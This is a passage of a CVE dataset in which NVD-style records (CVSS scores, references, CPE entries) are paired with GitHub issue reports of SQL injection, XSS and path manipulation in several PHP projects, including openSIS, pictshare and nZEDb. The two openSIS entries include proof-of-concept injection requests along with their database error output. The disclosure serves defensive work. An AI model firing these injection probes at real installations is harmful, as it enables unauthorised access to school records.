HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
<TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
</TR>
</TABLE>
<TABLE CELLSPACING=10 BORDER=0>
[…]
```
SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['staff'] to $value param.
```
$staffs=sqlSecurityFilter($_REQUEST['staff']);
foreach ($staffs as $column => $value) {
if ($column == 'BIRTHDATE' && $value!='')
{
$value = date("Y-m-d", strtotime($value));
}
``` | SQL injection in function STAFF.PHP | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/203/comments | 3 | 2021-09-22T08:17:21Z | 2023-01-02T07:13:01Z | https://github.com/OS4ED/openSIS-Classic/issues/203 | 1,003,989,113 | 203 | 2,815 |
CVE-2021-41679 | 2021-11-30T14:15:08.033 | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/204"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/204"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/204 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.

POC:

REQUEST:
GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
SQL:</b></TD>
<TD>SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2\'6</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/modules/grades/InputFinalGrades.php at 55</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'6' at line 1</TD>
</TR>
[…]
SOLUTION:
Use function sqlSecurityFilter() before assign $_REQUEST['period'] into query "SELECT".
`$period = sqlSecurityFilter($_REQUEST['period']);`

| SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/204/comments | 3 | 2021-09-22T08:56:02Z | 2023-01-02T07:12:45Z | https://github.com/OS4ED/openSIS-Classic/issues/204 | 1,004,035,839 | 204 | 2,816 |
CVE-2021-43690 | 2021-12-01T13:15:07.543 | YurunProxy v0.01 is affected by a Cross Site Scripting (XSS) vulnerability in src/Client.php. The exit function will terminate the script and print a message which have values from the socket_read. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yurunsoft/YurunProxy/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yurunsoft/YurunProxy/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yurunproxy_project:yurunproxy:0.01:*:*:*:*:*:*:*",
"matchCriteriaId": "DB65E479-CFA6-4BBE-9F9C-D9A7CA0DC078",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Yurunsoft/YurunProxy/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Yurunsoft",
"YurunProxy"
] | Hello,
I would like to report to XSS vulnerability.
The path.
In file src/Client.php line 30
```php
while(false !== $receiveResult = socket_read($socket, 2048, PHP_NORMAL_READ))
{
$receiveContent .= $receiveResult;
// ...
$data = $this->parser->receive($receiveContent);
// ...
}
```
In file src/ClientParser.php line 24
```php
public function receive($data)
{
$data = $this->parseData($data);
switch($data['a'])
{
// ...
case ServerAction::INIT_RESPONSE:
$this->worker->initResponse($data['data']);
break;
}
}
public function parseData($data)
{
return json_decode(substr($data, 0, -2), true);
}
```
In file src/ClientWorker.php line 98
```php
public function initResponse($data)
{
if(!$data['success'])
{
exit('Error: ' . $data['message']);
}
}
```
Exit function will terminate the script and print a message which have values from the socket_read. Which will lead to XSS vulnerability. | Possible XSS vulnerability | https://api.github.com/repos/Yurunsoft/YurunProxy/issues/3/comments | 1 | 2021-11-13T17:22:16Z | 2021-12-02T19:52:56Z | https://github.com/Yurunsoft/YurunProxy/issues/3 | 1,052,729,041 | 3 | 2,817 |
CVE-2021-43689 | 2021-12-01T15:15:07.657 | manage (last update Oct 24, 2017) is affected by a Cross Site Scripting (XSS) vulnerability in Application/Home/Controller/GoodsController.class.php. The exit function will terminate the script and print a message which have values from $_POST. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yicenburan/manage/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yicenburan/manage/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:manage_project:manage:-:*:*:*:*:*:*:*",
"matchCriteriaId": "99420DDF-92CF-4FE7-BDF2-397272175F6E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/yicenburan/manage/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yicenburan",
"manage"
] | Hello,
I would like to report to XSS vulnerability.
The path of the vulnerability.
In file Application/Home/Controller/GoodsController.class.php, line 21
```php
public function postGoods(){
$postData = $_POST;
$add=true;
$this->upload($postData,$add);
}
```
line 53
```php
public function upload($postData,$isAdd){
//...
$add['title']=$postData['title'];
$add['price']=$postData['price'];
$add['img']=$info['picture']['savepath'].$info['picture']['savename'];
if($isAdd){
$this->addGoods($add);
}
//...
}
}
```
line 77
```php
public function addGoods($addGoods){
// ...
if($result >= 0){
$data=array(
code=>'0',
msg=>'添加成功',
data=>$addGoods
);
$this->ajaxReturn($data);
}
// ...
}
```
In file ThinkPHP/Mode/Api/Controller.class.php
line 55
```php
protected function ajaxReturn($data,$type='') {
if(empty($type)) $type = C('DEFAULT_AJAX_RETURN');
switch (strtoupper($type)){
case 'JSON' :
// 返回JSON数据格式到客户端 包含状态信息
header('Content-Type:application/json; charset=utf-8');
exit(json_encode($data));
case 'XML' :
// 返回xml格式数据
header('Content-Type:text/xml; charset=utf-8');
exit(xml_encode($data));
case 'JSONP':
// 返回JSON数据格式到客户端 包含状态信息
header('Content-Type:application/json; charset=utf-8');
$handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER');
exit($handler.'('.json_encode($data).');');
case 'EVAL' :
// 返回可执行的js脚本
header('Content-Type:text/html; charset=utf-8');
exit($data);
}
}
```
exit function will terminate the script and print a message to the user. Then there is XSS vulnerability because it contains values from $_POST. | Possible XSS vilnerability | https://api.github.com/repos/yicenburan/manage/issues/2/comments | 2 | 2021-11-12T21:31:27Z | 2023-04-30T18:07:57Z | https://github.com/yicenburan/manage/issues/2 | 1,052,422,165 | 2 | 2,818 |
CVE-2021-43685 | 2021-12-01T16:15:07.737 | libretime hv3.0.0-alpha.10 is affected by a path manipulation vulnerability in /blob/master/legacy/application/modules/rest/controllers/ShowImageController.php through the rename function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "https://github.com/LibreTime/libretime/issues/1437"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "https://github.com/LibreTime/libretime/issues/1437"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libretime:libretime_hv:3.0.0:alpha.10:*:*:*:*:*:*",
"matchCriteriaId": "FD21AF31-9792-4048-B064-A46F993C8065",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"610"
] | 610 | https://github.com/LibreTime/libretime/issues/1437 | [
"Broken Link",
"Third Party Advisory"
] | github.com | [
"LibreTime",
"libretime"
] | Hello,
I would like to report for path manipulation vulnerability.
The path of the vulnerability.
In file https://github.com/LibreTime/libretime/blob/master/legacy/application/modules/rest/controllers/ShowImageController.php
line 319
```php
private function getShowId()
{
if (!($id = $this->_getParam('id', false))) {
//...
}
return $id;
}
```
line 52
```php
public function postAction()
{
$showId = $this->getShowId();
//...
try {
$path = $this->processUploadedImage($showId, $_FILES['file']['tmp_name']);
} catch (Exception $e) {
// ...
}
}
```
line 163
```php
private function processUploadedImage($showId, $tempFilePath)
{
//...
$importedStorageDirectory = $storDir->getDirectory() . 'imported/' . $ownerId . '/show-images/' . $showId;
try {
$importedStorageDirectory = $this->copyFileToStor($tempFilePath, $importedStorageDirectory, $fileExtension);
} catch (Exception $e) {
// ...
}
}
```
In file https://github.com/LibreTime/libretime/blob/master/legacy/application/common/OsPath.php
line 56
```php
public static function join()
{
$args = func_get_args();
$paths = [];
foreach ($args as $arg) {
$paths = array_merge($paths, (array) $arg);
}
foreach ($paths as &$path) {
$path = trim($path, DIRECTORY_SEPARATOR);
}
if (substr($args[0], 0, 1) == DIRECTORY_SEPARATOR) {
$paths[0] = DIRECTORY_SEPARATOR . $paths[0];
}
return implode(DIRECTORY_SEPARATOR, $paths);
}
```
In file https://github.com/LibreTime/libretime/blob/master/legacy/application/modules/rest/controllers/ShowImageController.php
line 256
```php
$image_stor = Application_Common_OsPath::join($importedStorageDirectory, $newFileName);
```
line 260
```php
// path manipulation in rename function
if (@rename($image_file, $image_stor) === false) {
//...
}
``` | Possible path manipulation vulnerability | https://api.github.com/repos/libretime/libretime/issues/1760/comments | 13 | 2021-11-11T18:10:07Z | 2022-04-12T14:21:32Z | https://github.com/libretime/libretime/issues/1760 | 1,201,923,181 | 1,760 | 2,819 |
CVE-2021-43681 | 2021-12-02T13:15:07.507 | SakuraPanel v1.0.1.1 is affected by a Cross Site Scripting (XSS) vulnerability in /master/core/PostHandler.php. The exit function will terminate the script and print the message $data['proxy_name']. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zerodream:sakurapanel:1.0.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C3EB08B4-8A06-429C-86F4-41A2A70D51B0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/ZeroDream-CN/SakuraPanel/issues/23 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZeroDream-CN",
"SakuraPanel"
] | Hello,
I would like to report for XSS vulnerability.
In file https://github.com/ZeroDream-CN/SakuraPanel/blob/master/core/PostHandler.php
line 87
```php
$result = $pm->checkRules($_POST);
```
In function checkRules
```php
public function checkRules($data)
{
// ....
if($this->isProxyNameExist($data['proxy_name'])) {
return Array(false, "éš§é�“ {$data['proxy_name']} å·²å˜åœ¨ï¼Œè¯·ä½¿ç”¨å…¶ä»–å��å—");
}
// ....
}
```
line 96
```php
$msg = $result[1] ?? "未知错误";
exit($msg);
```
exit will terminate the script and print the message which have the value $data['proxy_name']. Then there is XSS vulnerability | Possible XSS vulnerability | https://api.github.com/repos/ZeroDream-CN/SakuraPanel/issues/23/comments | 4 | 2021-11-11T16:17:30Z | 2021-12-09T04:27:49Z | https://github.com/ZeroDream-CN/SakuraPanel/issues/23 | 1,051,143,872 | 23 | 2,820 |
CVE-2021-43683 | 2021-12-02T13:15:07.623 | pictshare v1.5 is affected by a Cross Site Scripting (XSS) vulnerability in api/info.php. The exit function will terminate the script and print the message which has $_REQUEST['hash']. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/HaschekSolutions/pictshare/issues/133"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/HaschekSolutions/pictshare/issues/133"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:haschek:pictshare:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8F6ED65A-5FD8-4824-844C-C2B7F1E87D5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/HaschekSolutions/pictshare/issues/133 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"HaschekSolutions",
"pictshare"
] | Hello,
I would like to report for XSS vulnerability.
in api/info.php
function getInfoAboutHash
```php
function getInfoAboutHash($hash)
{
// ...
return array('hash'=>$hash,'size_bytes'=>$size,'size_interpreted'=>$size_hr,'type'=>$type,'type_interpreted'=>getTypeOfFile($file));
}
```
line 15
```php
$hash = $_REQUEST['hash'];
// ...
$answer = getInfoAboutHash($hash);
$answer['status'] = 'ok';
exit(json_encode($answer));
// ...
```
exit function will terminate the script and print the message which has $_REQUEST['hash'].
Then there is XSS vulnerability. | Possible XSS vulnerability | https://api.github.com/repos/HaschekSolutions/pictshare/issues/133/comments | 7 | 2021-11-11T17:03:54Z | 2021-12-10T08:42:40Z | https://github.com/HaschekSolutions/pictshare/issues/133 | 1,051,185,075 | 133 | 2,821 |
CVE-2021-43686 | 2021-12-02T13:15:07.667 | nZEDb v0.4.20 is affected by a Cross Site Scripting (XSS) vulnerability in www/pages/api.php. The exit function will terminate the script and print the message which has the input $_GET['t']. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nZEDb/nZEDb/issues/2659"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nZEDb/nZEDb/issues/2659"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nzedb_project:nzedb:0.4.20:*:*:*:*:*:*:*",
"matchCriteriaId": "642EED0E-97CA-4C26-BBA8-071F166A2B9F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/nZEDb/nZEDb/issues/2659 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nZEDb",
"nZEDb"
] | Hello,
I would like to report for XSS vulnerability.
The path of the vulnerability
file www/pages/api.php line 49
```php
Misc::showApiError(202, 'No such function (' . $_GET['t'] . ')');
```
file nzedb/utility/Misc.php in line 991
```php
public static function showApiError($status = 900, $message = ''): void
{
// ...
$response =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" .
'<error code="' . $status . '" description="' . $message . "\"/>\n";
header('Content-type: text/xml');
header('Content-Length: ' . \strlen($response) );
header('X-nZEDb: API ERROR [' . $status . '] ' . $message);
http_response_code($status);
exit($response);
}
```
exit function will terminate the script and print the message which has the input $_GET['t']. Then there is XSS vulnerability. | Possible XSS vulnerability | https://api.github.com/repos/nZEDb/nZEDb/issues/2659/comments | 2 | 2021-11-12T15:10:52Z | 2021-12-05T06:18:32Z | https://github.com/nZEDb/nZEDb/issues/2659 | 1,052,067,075 | 2,659 | 2,822 |
CVE-2021-43682 | 2021-12-02T14:15:08.047 | thinkphp-bjyblog (last update Jun 4 2021) is affected by a Cross Site Scripting (XSS) vulnerability in AdminBaseController.class.php. The exit function terminates the script and prints a message to the user that contains $_SERVER['HTTP_HOST']. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkphp-bjyblog_project:thinkphp-bjyblog:-:*:*:*:*:*:*:*",
"matchCriteriaId": "887A20DC-5B52-428B-A51B-32375BEB58AD",
"versionEndExcluding": null,
"versionEndIncluding": null,
